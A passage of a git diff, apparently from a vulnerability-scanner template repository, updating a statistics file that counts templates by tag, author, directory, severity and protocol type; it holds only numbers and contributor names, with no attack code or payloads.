tao","count":1},{"name":"vzamanillo","count":1},{"name":"nytr0gen","count":1},{"name":"elmahdi","count":1},{"name":"shreyapohekar","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"0h1in9e","count":1},{"name":"ooooooo_q","count":1},{"name":"ldionmarcil","count":1},{"name":"becivells","count":1},{"name":"sec_hawk","count":1},{"name":"iampritam","count":1},{"name":"apt-mirror","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"fmunozs","count":1},{"name":"adrianmf","count":1},{"name":"mah3sec_","count":1},{"name":"juicypotato1","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"willd96","count":1},{"name":"qlkwej","count":1},{"name":"daviey","count":1},{"name":"0xrod","count":1},{"name":"omarkurt","count":1},{"name":"pdp","count":1},{"name":"evolutionsec","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"zhenwarx","count":1},{"name":"philippdelteil","count":1},{"name":"regala_","count":1},{"name":"0xteles","count":1},{"name":"bjhulst","count":1},{"name":"wabafet","count":1},{"name":"b0yd","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"affix","count":1},{"name":"schniggie","count":1},{"name":"intx0x80","count":1},{"name":"naglinagli","count":1},{"name":"sickwell","count":1},{"name":"bernardofsr","count":1},{"name":"knassar702","count":1},{"name":"kareemse1im","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"kabirsuda","count":1},{"name":"shelld3v","count":1},{"name":"divya_mudgal","count":1},{"name":"geraldino2","count":1},{"name":"gboddin","count":1},{"name":"petruknisme","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"akshansh","count":1},{"name":"retr0","count":1},{"name":"b4uh0lz","count":1},{"name":"tim_koopmans","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"@dwisiswant0","count":1},{"name":"rojanrijal","count":1},{"name":"exploitation","count":1},{"name":"blckraven","count":1},{"name":"_c0wb0y_","count":1},{"name":"berkdusunur","count":1},{"name":"andirrahmani1","count":1},{"name":"thevillagehacker","count":1},{"name":"jteles","count":1},{"name":"taielab","count":1},{"name":"ohlinge","count":1},{"name":"sicksec","count":1},{"name":"mass0ma","count":1},{"name":"pudsec","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"yashgoti","count":1},{"name":"b0rn2r00t","count":1},{"name":"streetofhackerr007","count":1},{"name":"mubassirpatel","count":1},{"name":"absshax","count":1},{"name":"bad5ect0r","count":1},{"name":"its0x08","count":1},{"name":"whynotke","count":1},{"name":"noamrathaus","count":1},{"name":"th3.d1p4k","count":1},{"name":"chron0x","count":1},{"name":"ipanda","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"kre80r","count":1},{"name":"udyz","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"infosecsanyam","count":1},{"name":"alph4byt3","count":1},{"name":"sullo","count":1},{"name":"x6263","count":1},{"name":"andysvints","count":1},{"name":"remonsec","count":1},{"name":"co0nan","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"defr0ggy","count":1},{"name":"mesaglio","count":1},{"name":"d0rkerdevil","count":1},{"name":"furkansenan","count":1},{"name":"ringo","count":1},{"name":"idealphase","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"sshell","count":1},{"name":"fopina","count":1},{"name":"tirtha_mandal","count":1},{"name":"akash.c","count":1},{"name":"kurohost","count":1},{"name":"smaranchand","count":1},{"name":"thezakman","count":1},{"name":"notsoevilweasel","count":1},{"name":"luci","count":1},{"name":"jeya seelan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"raesene","count":1},{"name":"me9187","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"alperenkesk","count":1},{"name":"micha3lb3n","count":1},{"name":"bolli95","count":1},{"name":"shifacyclewla","count":1},{"name":"ilovebinbash","count":1}],"directory":[{"name":"cves","count":674},{"name":"vulnerabilities","count":284},{"name":"exposed-panels","count":235},{"name":"exposures","count":186},{"name":"technologies","count":170},{"name":"misconfiguration","count":129},{"name":"takeovers","count":71},{"name":"default-logins","count":54},{"name":"file","count":46},{"name":"workflows","count":35},{"name":"network","count":30},{"name":"miscellaneous","count":24},{"name":"iot","count":23},{"name":"dns","count":11},{"name":"fuzzing","count":9},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":615},{"name":"high","count":535},{"name":"medium","count":413},{"name":"critical","count":236},{"name":"low","count":161}],"types":[{"name":"http","count":1859},{"name":"file","count":46},{"name":"network","count":39},{"name":"dns","count":11}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 30f542f672..a7efc05b55 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,741 +1,750 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| cve2021 | 106 | pussycat0x | 48 | workflows | 35 | | | | | -| tech | 106 | gaurang | 42 | network | 30 | | | | | -| config | 93 | ice3man | 26 | miscellaneous | 28 | | | | | -| cve2019 | 91 | organiccrap | 24 | iot | 23 | | | | | -| cve2018 | 80 | 0x_akoko | 24 | dns | 11 | | | | | -| takeover | 74 | philippedelteil | 19 | fuzzing | 9 | | | | | -| | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | -| apache | 66 | milo2012 | 14 | headless | 5 | | | | | -| token | 64 | techbrunchfr | 13 | .pre-commit-config.yaml | 1 | | | | | -| default-login | 58 | pr3r00t | 13 | | | | | | | -| iot | 56 | suman_kar | 12 | | | | | | | -| joomla | 52 | cyllective | 11 | | | | | | | -| cve2017 | 48 | r3dg33k | 11 | | | | | | | -| file | 46 | righettod | 10 | | | | | | | -| unauth | 45 | random_robbie | 10 | | | | | | | -| oob | 45 | wdahlenb | 9 | | | | | | | -| cve2010 | 44 | hackergautam | 9 | | | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | pussycat0x | 55 | file | 46 | | | | | +| cve2021 | 112 | princechaddha | 55 | workflows | 35 | | | | | +| tech | 111 | gaurang | 42 | network | 30 | | | | | +| config | 93 | ice3man | 26 | miscellaneous | 24 | | | | | +| cve2019 | 90 | 0x_akoko | 25 | iot | 23 | | | | | +| cve2018 | 80 | organiccrap | 24 | dns | 11 | | | | | +| takeover | 74 | philippedelteil | 21 | fuzzing | 9 | | | | | +| apache | 66 | sheikhrishad | 15 | cnvd | 9 | | | | | +| | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 64 | pr3r00t | 13 | .pre-commit-config.yaml | 1 | | | | | +| default-login | 60 | techbrunchfr | 13 | | | | | | | +| joomla | 59 | suman_kar | 12 | | | | | | | +| iot | 58 | cyllective | 11 | | | | | | | +| cve2010 | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| oob | 48 | righettod | 10 | | | | | | | +| file | 46 | wdahlenb | 9 | | | | | | | +| unauth | 45 | melbadry9 | 9 | | | | | | | | network | 39 | nadino | 9 | | | | | | | -| sqli | 37 | melbadry9 | 9 | | | | | | | -| ssrf | 32 | aashiq | 8 | | | | | | | -| cve2016 | 32 | that_juan_ | 8 | | | | | | | -| workflow | 30 | iamthefrogy | 8 | | | | | | | -| oracle | 30 | 0x240x23elu | 7 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| ssrf | 35 | that_juan_ | 8 | | | | | | | +| cve2016 | 32 | aashiq | 8 | | | | | | | +| oracle | 31 | iamthefrogy | 8 | | | | | | | | logs | 30 | kophjager007 | 7 | | | | | | | -| jira | 28 | techryptic (@tech) | 7 | | | | | | | -| misc | 27 | oppsec | 7 | | | | | | | -| atlassian | 27 | randomstr1ng | 7 | | | | | | | -| redirect | 26 | dogasantos | 7 | | | | | | | +| workflow | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 28 | randomstr1ng | 7 | | | | | | | +| jira | 28 | dogasantos | 7 | | | | | | | +| atlassian | 27 | emadshanab | 7 | | | | | | | | listing | 25 | dr_set | 7 | | | | | | | -| generic | 22 | harshbothra_ | 7 | | | | | | | -| aem | 19 | emadshanab | 7 | | | | | | | -| cisco | 19 | __fazal | 6 | | | | | | | -| router | 19 | puzzlepeaches | 6 | | | | | | | -| cve2015 | 19 | caspergn | 6 | | | | | | | -| sap | 18 | meme-lord | 6 | | | | | | | -| disclosure | 18 | elsfa7110 | 5 | | | | | | | -| auth-bypass | 17 | joanbono | 5 | | | | | | | -| springboot | 16 | yanyun | 5 | | | | | | | -| cve2014 | 15 | panch0r3d | 5 | | | | | | | -| cve2012 | 14 | iamnoooob | 5 | | | | | | | -| debug | 14 | rootxharsh | 5 | | | | | | | -| android | 13 | pentest_swissky | 5 | | | | | | | -| cve2011 | 13 | logicalhunter | 5 | | | | | | | -| misconfig | 13 | ganofins | 5 | | | | | | | -| struts | 13 | nodauf | 4 | | | | | | | +| misc | 23 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 20 | harshbothra_ | 7 | | | | | | | +| disclosure | 20 | oppsec | 7 | | | | | | | +| cisco | 19 | meme-lord | 6 | | | | | | | +| generic | 19 | logicalhunter | 6 | | | | | | | +| aem | 19 | puzzlepeaches | 6 | | | | | | | +| router | 19 | caspergn | 6 | | | | | | | +| sap | 18 | __fazal | 6 | | | | | | | +| auth-bypass | 17 | ganofins | 5 | | | | | | | +| springboot | 16 | elsfa7110 | 5 | | | | | | | +| debug | 15 | yanyun | 5 | | | | | | | +| cve2014 | 15 | joanbono | 5 | | | | | | | +| misconfig | 14 | panch0r3d | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| cve2011 | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | iamnoooob | 5 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| adobe | 13 | e_schultze_ | 4 | | | | | | | | fuzz | 13 | github.com/its0x08 | 4 | | | | | | | -| adobe | 12 | e_schultze_ | 4 | | | | | | | -| weblogic | 12 | xelkomy | 4 | | | | | | | -| jenkins | 12 | tess | 3 | | | | | | | -| dns | 12 | dudez | 3 | | | | | | | -| php | 12 | emenalf | 3 | | | | | | | -| dlink | 12 | thomas_from_offensity | 3 | | | | | | | -| zoho | 11 | impramodsargar | 3 | | | | | | | -| cve2013 | 11 | vsh00t | 3 | | | | | | | -| devops | 11 | shine | 3 | | | | | | | -| ftp | 9 | lu4nx | 3 | | | | | | | -| magento | 9 | shifacyclewala | 3 | | | | | | | -| xxe | 9 | jarijaas | 3 | | | | | | | -| aws | 9 | yash anand @yashanand155 | 3 | | | | | | | -| login | 8 | f1tz | 3 | | | | | | | -| airflow | 8 | _generic_human_ | 3 | | | | | | | -| gitlab | 8 | fyoorer | 3 | | | | | | | -| rails | 8 | incogbyte | 3 | | | | | | | -| scada | 8 | mavericknerd | 3 | | | | | | | -| ruijie | 8 | binaryfigments | 3 | | | | | | | -| cnvd | 8 | z3bd | 3 | | | | | | | -| cms | 7 | 0w4ys | 3 | | | | | | | -| nginx | 7 | gal nagli | 2 | | | | | | | -| backup | 7 | random-robbie | 2 | | | | | | | -| vmware | 7 | dheerajmadhukar | 2 | | | | | | | -| cve2009 | 7 | pxmme1337 | 2 | | | | | | | -| citrix | 6 | hahwul | 2 | | | | | | | -| coldfusion | 6 | arcc | 2 | | | | | | | -| docker | 6 | fabaff | 2 | | | | | | | -| laravel | 6 | whoever | 2 | | | | | | | -| jetty | 6 | alifathi-h1 | 2 | | | | | | | -| api | 6 | ehsahil | 2 | | | | | | | -| google | 6 | parth | 2 | | | | | | | -| solr | 6 | ree4pwn | 2 | | | | | | | -| dell | 6 | moritz nentwig | 2 | | | | | | | -| rconfig | 6 | hetroublemakr | 2 | | | | | | | -| django | 6 | 0xrudra | 2 | | | | | | | -| files | 6 | 0xelkomy | 2 | | | | | | | -| cve2008 | 6 | vavkamil | 2 | | | | | | | -| netgear | 6 | w4cky_ | 2 | | | | | | | -| drupal | 5 | zomsop82 | 2 | | | | | | | -| printer | 5 | 0xprial | 2 | | | | | | | -| headless | 5 | bing0o | 2 | | | | | | | -| phpmyadmin | 5 | cocxanh | 2 | | | | | | | -| confluence | 5 | afaq | 2 | | | | | | | -| wp-theme | 5 | randomrobbie | 2 | | | | | | | -| windows | 5 | manas_harsh | 2 | | | | | | | -| circarlife | 5 | 0xcrypto | 2 | | | | | | | -| fileupload | 5 | nkxxkn | 2 | | | | | | | -| ssti | 5 | 0xsapra | 2 | | | | | | | -| microsoft | 5 | x1m_martijn | 2 | | | | | | | -| ibm | 5 | bp0lr | 2 | | | | | | | -| lucee | 5 | lotusdll | 2 | | | | | | | -| iis | 5 | gevakun | 2 | | | | | | | -| java | 5 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| dedecms | 5 | joeldeleep | 2 | | | | | | | -| jolokia | 4 | koti2 | 2 | | | | | | | -| tomcat | 4 | swissky | 2 | | | | | | | -| hp | 4 | sushantkamble | 2 | | | | | | | -| glpi | 4 | davidmckennirey | 2 | | | | | | | -| deserialization | 4 | foulenzer | 2 | | | | | | | -| crlf | 4 | mohammedsaneem | 2 | | | | | | | -| thinkphp | 4 | amsda | 2 | | | | | | | -| zimbra | 4 | bsysop | 2 | | | | | | | -| samsung | 4 | unstabl3 | 2 | | | | | | | -| wso2 | 4 | kiblyn11 | 2 | | | | | | | -| webserver | 4 | udit_thakkur | 2 | | | | | | | -| hongdian | 4 | yashanand155 | 1 | | | | | | | -| moodle | 4 | andirrahmani1 | 1 | | | | | | | -| grafana | 4 | j33n1k4 | 1 | | | | | | | -| elastic | 4 | johnjhacking | 1 | | | | | | | -| firmware | 4 | omarkurt | 1 | | | | | | | -| thinkcmf | 4 | blckraven | 1 | | | | | | | -| symfony | 4 | bad5ect0r | 1 | | | | | | | -| nodejs | 4 | streetofhackerr007 | 1 | | | | | | | -| artifactory | 4 | sid ahmed malaoui @ realistic | 1 | | | | | | | +| android | 13 | nodauf | 4 | | | | | | | +| weblogic | 12 | thomas_from_offensity | 3 | | | | | | | +| devops | 12 | impramodsargar | 3 | | | | | | | +| dlink | 12 | emenalf | 3 | | | | | | | +| dns | 12 | incogbyte | 3 | | | | | | | +| jenkins | 12 | 0w4ys | 3 | | | | | | | +| cve2013 | 11 | mavericknerd | 3 | | | | | | | +| zoho | 11 | shine | 3 | | | | | | | +| magento | 9 | f1tz | 3 | | | | | | | +| xxe | 9 | binaryfigments | 3 | | | | | | | +| ftp | 9 | fyoorer | 3 | | | | | | | +| aws | 9 | vsh00t | 3 | | | | | | | +| ruijie | 8 | lu4nx | 3 | | | | | | | +| scada | 8 | z3bd | 3 | | | | | | | +| login | 8 | dudez | 3 | | | | | | | +| cnvd | 8 | jarijaas | 3 | | | | | | | +| gitlab | 8 | shifacyclewala | 3 | | | | | | | +| airflow | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| cms | 7 | yash anand @yashanand155 | 3 | | | | | | | +| kubernetes | 7 | hahwul | 2 | | | | | | | +| nginx | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | +| netgear | 7 | swissky | 2 | | | | | | | +| cve2009 | 7 | 0xprial | 2 | | | | | | | +| files | 7 | w4cky_ | 2 | | | | | | | +| backup | 7 | 0xcrypto | 2 | | | | | | | +| coldfusion | 7 | 0xrudra | 2 | | | | | | | +| vmware | 7 | cocxanh | 2 | | | | | | | +| google | 6 | gal nagli | 2 | | | | | | | +| api | 6 | lotusdll | 2 | | | | | | | +| solr | 6 | koti2 | 2 | | | | | | | +| cve2008 | 6 | fabaff | 2 | | | | | | | +| django | 6 | pxmme1337 | 2 | | | | | | | +| dell | 6 | udit_thakkur | 2 | | | | | | | +| rconfig | 6 | random-robbie | 2 | | | | | | | +| jetty | 6 | unstabl3 | 2 | | | | | | | +| docker | 6 | ree4pwn | 2 | | | | | | | +| laravel | 6 | johnjhacking | 2 | | | | | | | +| citrix | 6 | dheerajmadhukar | 2 | | | | | | | +| confluence | 6 | 0xsapra | 2 | | | | | | | +| windows | 5 | afaq | 2 | | | | | | | +| circarlife | 5 | foulenzer | 2 | | | | | | | +| drupal | 5 | 0xelkomy | 2 | | | | | | | +| headless | 5 | bp0lr | 2 | | | | | | | +| lucee | 5 | moritz nentwig | 2 | | | | | | | +| microsoft | 5 | arcc | 2 | | | | | | | +| fileupload | 5 | bsysop | 2 | | | | | | | +| java | 5 | hetroublemakr | 2 | | | | | | | +| nodejs | 5 | randomrobbie | 2 | | | | | | | +| ssti | 5 | huowuzhao | 2 | | | | | | | +| printer | 5 | nkxxkn | 2 | | | | | | | +| phpmyadmin | 5 | kiblyn11 | 2 | | | | | | | +| iis | 5 | socketz | 2 | | | | | | | +| wp-theme | 5 | davidmckennirey | 2 | | | | | | | +| dedecms | 5 | gevakun | 2 | | | | | | | +| ibm | 5 | joeldeleep | 2 | | | | | | | +| hongdian | 4 | zomsop82 | 2 | | | | | | | +| magmi | 4 | mohammedsaneem | 2 | | | | | | | +| crlf | 4 | amsda | 2 | | | | | | | +| samsung | 4 | ehsahil | 2 | | | | | | | +| wso2 | 4 | whoever | 2 | | | | | | | +| solarwinds | 4 | bing0o | 2 | | | | | | | +| vpn | 4 | vavkamil | 2 | | | | | | | +| traversal | 4 | sushantkamble | 2 | | | | | | | +| artifactory | 4 | r3naissance | 2 | | | | | | | +| deserialization | 4 | convisoappsec | 2 | | | | | | | +| tomcat | 4 | g4l1t0 | 2 | | | | | | | +| firmware | 4 | x1m_martijn | 2 | | | | | | | +| zimbra | 4 | alifathi-h1 | 2 | | | | | | | +| thinkphp | 4 | manas_harsh | 2 | | | | | | | +| jolokia | 4 | parth | 2 | | | | | | | +| glpi | 4 | kurohost | 1 | | | | | | | +| grafana | 4 | ldionmarcil | 1 | | | | | | | +| elastic | 4 | notsoevilweasel | 1 | | | | | | | +| exchange | 4 | luskabol | 1 | | | | | | | +| asp | 4 | c3l3si4n | 1 | | | | | | | +| buffalo | 4 | zandros0 | 1 | | | | | | | +| thinkcmf | 4 | udyz | 1 | | | | | | | +| hp | 4 | sickwell | 1 | | | | | | | +| symfony | 4 | b4uh0lz | 1 | | | | | | | +| webserver | 4 | akshansh | 1 | | | | | | | +| moodle | 4 | j3ssie/geraldino2 | 1 | | | | | | | +| zhiyuan | 3 | deena | 1 | | | | | | | +| ebs | 3 | revblock | 1 | | | | | | | +| fpd | 3 | hanlaomo | 1 | | | | | | | +| lfr | 3 | mah3sec_ | 1 | | | | | | | +| resin | 3 | akash.c | 1 | | | | | | | +| caucho | 3 | defr0ggy | 1 | | | | | | | +| mongodb | 3 | elder tao | 1 | | | | | | | +| ofbiz | 3 | divya_mudgal | 1 | | | | | | | +| openssh | 3 | x6263 | 1 | | | | | | | +| fanruan | 3 | _c0wb0y_ | 1 | | | | | | | +| opensis | 3 | me9187 | 1 | | | | | | | +| git | 3 | @dwisiswant0 | 1 | | | | | | | +| amazon | 3 | ohlinge | 1 | | | | | | | +| oa | 3 | regala_ | 1 | | | | | | | +| terramaster | 3 | mass0ma | 1 | | | | | | | +| nacos | 3 | evolutionsec | 1 | | | | | | | +| nosqli | 3 | johnk3r | 1 | | | | | | | +| targa | 3 | co0nan | 1 | | | | | | | +| vbulletin | 3 | daviey | 1 | | | | | | | +| intrusive | 3 | berkdusunur | 1 | | | | | | | +| zabbix | 3 | 0xtavian | 1 | | | | | | | +| slack | 3 | th3.d1p4k | 1 | | | | | | | +| r-seenet | 3 | shifacyclewla | 1 | | | | | | | +| microstrategy | 3 | bjhulst | 1 | | | | | | | +| ssh | 3 | omarkurt | 1 | | | | | | | +| httpd | 3 | fmunozs | 1 | | | | | | | +| itop | 3 | mesaglio | 1 | | | | | | | +| log | 3 | sicksec | 1 | | | | | | | +| kevinlab | 3 | kabirsuda | 1 | | | | | | | +| kafka | 3 | iampritam | 1 | | | | | | | +| bitrix | 3 | _harleo | 1 | | | | | | | +| backups | 3 | ipanda | 1 | | | | | | | +| springcloud | 3 | sy3omda | 1 | | | | | | | +| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | +| tikiwiki | 3 | bernardofsr | 1 | | | | | | | +| bypass | 3 | toufik airane | 1 | | | | | | | +| couchdb | 2 | yashanand155 | 1 | | | | | | | +| cve2005 | 2 | mubassirpatel | 1 | | | | | | | +| flir | 2 | streetofhackerr007 | 1 | | | | | | | +| natshell | 2 | ilovebinbash | 1 | | | | | | | +| mida | 2 | skeltavik | 1 | | | | | | | +| nagios | 2 | un-fmunozs | 1 | | | | | | | +| npm | 2 | 0ut0fb4nd | 1 | | | | | | | +| splunk | 2 | its0x08 | 1 | | | | | | | +| guacamole | 2 | zhenwarx | 1 | | | | | | | +| yapi | 2 | exploitation | 1 | | | | | | | +| maian | 2 | rtcms | 1 | | | | | | | +| waf | 2 | smaranchand | 1 | | | | | | | +| sonicwall | 2 | alperenkesk | 1 | | | | | | | +| cve2007 | 2 | thevillagehacker | 1 | | | | | | | +| jeedom | 2 | aresx | 1 | | | | | | | +| geowebserver | 2 | luci | 1 | | | | | | | +| status | 2 | adrianmf | 1 | | | | | | | +| plesk | 2 | knassar702 | 1 | | | | | | | +| prometheus | 2 | kre80r | 1 | | | | | | | +| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | +| seeyon | 2 | andysvints | 1 | | | | | | | +| keycloak | 2 | d0rkerdevil | 1 | | | | | | | +| frp | 2 | noamrathaus | 1 | | | | | | | +| telerik | 2 | pudsec | 1 | | | | | | | +| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | +| akkadian | 2 | 52971 | 1 | | | | | | | +| smb | 2 | yashgoti | 1 | | | | | | | +| prestashop | 2 | blckraven | 1 | | | | | | | +| chiyu | 2 | jteles | 1 | | | | | | | +| leak | 2 | nytr0gen | 1 | | | | | | | +| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | +| | | soni) | | | | | | | | +| dolibarr | 2 | alph4byt3 | 1 | | | | | | | +| openfire | 2 | undefl0w | 1 | | | | | | | +| spark | 2 | vzamanillo | 1 | | | | | | | +| oauth | 2 | idealphase | 1 | | | | | | | +| ec2 | 2 | shelld3v | 1 | | | | | | | +| jboss | 2 | pratik khalane | 1 | | | | | | | +| rockethchat | 2 | sshell | 1 | | | | | | | +| node | 2 | cookiehanhoan | 1 | | | | | | | +| wordfence | 2 | kba@sogeti_esec | 1 | | | | | | | +| openam | 2 | retr0 | 1 | | | | | | | +| icewarp | 2 | _darrenmartyn | 1 | | | | | | | +| sharepoint | 2 | apt-mirror | 1 | | | | | | | +| mail | 2 | abison_binoy | 1 | | | | | | | +| axis2 | 2 | remonsec | 1 | | | | | | | +| proxy | 2 | 0xteles | 1 | | | | | | | +| grav | 2 | hakluke | 1 | | | | | | | +| rockmongo | 2 | alex | 1 | | | | | | | +| firebase | 2 | affix | 1 | | | | | | | +| saltstack | 2 | infosecsanyam | 1 | | | | | | | +| service | 2 | juicypotato1 | 1 | | | | | | | +| jellyfin | 2 | dawid-czarnecki | 1 | | | | | | | +| trixbox | 2 | @github.com/defr0ggy | 1 | | | | | | | +| odoo | 2 | 0xrod | 1 | | | | | | | +| azure | 2 | willd96 | 1 | | | | | | | +| pega | 2 | bad5ect0r | 1 | | | | | | | +| bigip | 2 | intx0x80 | 1 | | | | | | | +| injection | 2 | ajaysenr | 1 | | | | | | | +| dos | 2 | aaron_costello | 1 | | | | | | | +| | | (@conspiracyproof) | | | | | | | | +| jsf | 2 | b0rn2r00t | 1 | | | | | | | +| middleware | 2 | rodnt | 1 | | | | | | | +| mcafee | 2 | sullo | 1 | | | | | | | +| ecology | 2 | naglinagli | 1 | | | | | | | +| glassfish | 2 | manuelbua | 1 | | | | | | | +| hpe | 2 | pdp | 1 | | | | | | | +| netis | 2 | patralos | 1 | | | | | | | +| rstudio | 2 | petruknisme | 1 | | | | | | | +| igs | 2 | chron0x | 1 | | | | | | | +| linkerd | 2 | flag007 | 1 | | | | | | | +| hoteldruid | 2 | mhdsamx | 1 | | | | | | | +| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | +| axis | 2 | rojanrijal | 1 | | | | | | | +| voipmonitor | 2 | ahmed sherif | 1 | | | | | | | +| kibana | 2 | philippdelteil | 1 | | | | | | | +| phpcollab | 2 | micha3lb3n | 1 | | | | | | | +| backdoor | 2 | wabafet | 1 | | | | | | | +| paloalto | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | | | | security | | | | | | | | -| traversal | 4 | retr0 | 1 | | | | | | | -| exchange | 4 | regala_ | 1 | | | | | | | -| solarwinds | 4 | intx0x80 | 1 | | | | | | | -| vpn | 4 | luci | 1 | | | | | | | -| magmi | 4 | juicypotato1 | 1 | | | | | | | -| asp | 4 | mah3sec_ | 1 | | | | | | | -| buffalo | 4 | convisoappsec | 1 | | | | | | | -| oa | 3 | deena | 1 | | | | | | | -| terramaster | 3 | aresx | 1 | | | | | | | -| bitrix | 3 | kurohost | 1 | | | | | | | -| nexus | 3 | undefl0w | 1 | | | | | | | -| fanruan | 3 | mhdsamx | 1 | | | | | | | -| zabbix | 3 | schniggie | 1 | | | | | | | -| slack | 3 | shelld3v | 1 | | | | | | | -| itop | 3 | bjhulst | 1 | | | | | | | -| kafka | 3 | raesene | 1 | | | | | | | -| vbulletin | 3 | abison_binoy | 1 | | | | | | | -| bypass | 3 | apt-mirror | 1 | | | | | | | -| mongodb | 3 | zhenwarx | 1 | | | | | | | -| lfr | 3 | cookiehanhoan | 1 | | | | | | | -| targa | 3 | hakluke | 1 | | | | | | | -| caucho | 3 | petruknisme | 1 | | | | | | | -| ssh | 3 | berkdusunur | 1 | | | | | | | -| nosqli | 3 | bernardo rodrigues | 1 | | | | | | | +| xxljob | 2 | shreyapohekar | 1 | | | | | | | +| vrealize | 2 | bolli95 | 1 | | | | | | | +| webcam | 2 | absshax | 1 | | | | | | | +| emerge | 2 | tirtha_mandal | 1 | | | | | | | +| hasura | 2 | 0h1in9e | 1 | | | | | | | +| shellshock | 2 | gboddin | 1 | | | | | | | +| strapi | 2 | yavolo | 1 | | | | | | | +| idrac | 2 | fopina | 1 | | | | | | | +| showdoc | 2 | makyotox | 1 | | | | | | | +| chamilo | 2 | tim_koopmans | 1 | | | | | | | +| horde | 2 | thezakman | 1 | | | | | | | +| hjtcloud | 2 | ringo | 1 | | | | | | | +| ucmdb | 2 | sec_hawk | 1 | | | | | | | +| akamai | 2 | furkansenan | 1 | | | | | | | +| kentico | 2 | qlkwej | 1 | | | | | | | +| smtp | 2 | whynotke | 1 | | | | | | | +| hashicorp | 2 | geraldino2 | 1 | | | | | | | +| activemq | 2 | taielab | 1 | | | | | | | +| huawei | 2 | jeya seelan | 1 | | | | | | | +| cache | 2 | soyelmago | 1 | | | | | | | +| sonarqube | 2 | elmahdi | 1 | | | | | | | +| fortios | 2 | s1r1u5_ | 1 | | | | | | | +| etouch | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | +| bash | 1 | becivells | 1 | | | | | | | +| 74cms | 1 | izn0u | 1 | | | | | | | +| smartblog | 1 | j33n1k4 | 1 | | | | | | | +| cloudflare | 1 | b0yd | 1 | | | | | | | +| api-manager | 1 | ooooooo_q | 1 | | | | | | | +| clink-office | 1 | raesene | 1 | | | | | | | +| codeigniter | 1 | kareemse1im | 1 | | | | | | | +| solarlog | 1 | borna nematzadeh | 1 | | | | | | | +| interlib | 1 | andirrahmani1 | 1 | | | | | | | +| primetek | 1 | schniggie | 1 | | | | | | | +| nexusdb | 1 | bernardo rodrigues | 1 | | | | | | | | | | @bernardofsr | andré monteiro | | | | | | | | | | | @am0nt31r0 | | | | | | | | -| ebs | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| backups | 3 | yavolo | 1 | | | | | | | -| resin | 3 | andysvints | 1 | | | | | | | -| zhiyuan | 3 | kba@sogeti_esec | 1 | | | | | | | -| ofbiz | 3 | bolli95 | 1 | | | | | | | -| openssh | 3 | sy3omda | 1 | | | | | | | -| httpd | 3 | manuelbua | 1 | | | | | | | -| microstrategy | 3 | noamrathaus | 1 | | | | | | | -| kubernetes | 3 | rojanrijal | 1 | | | | | | | 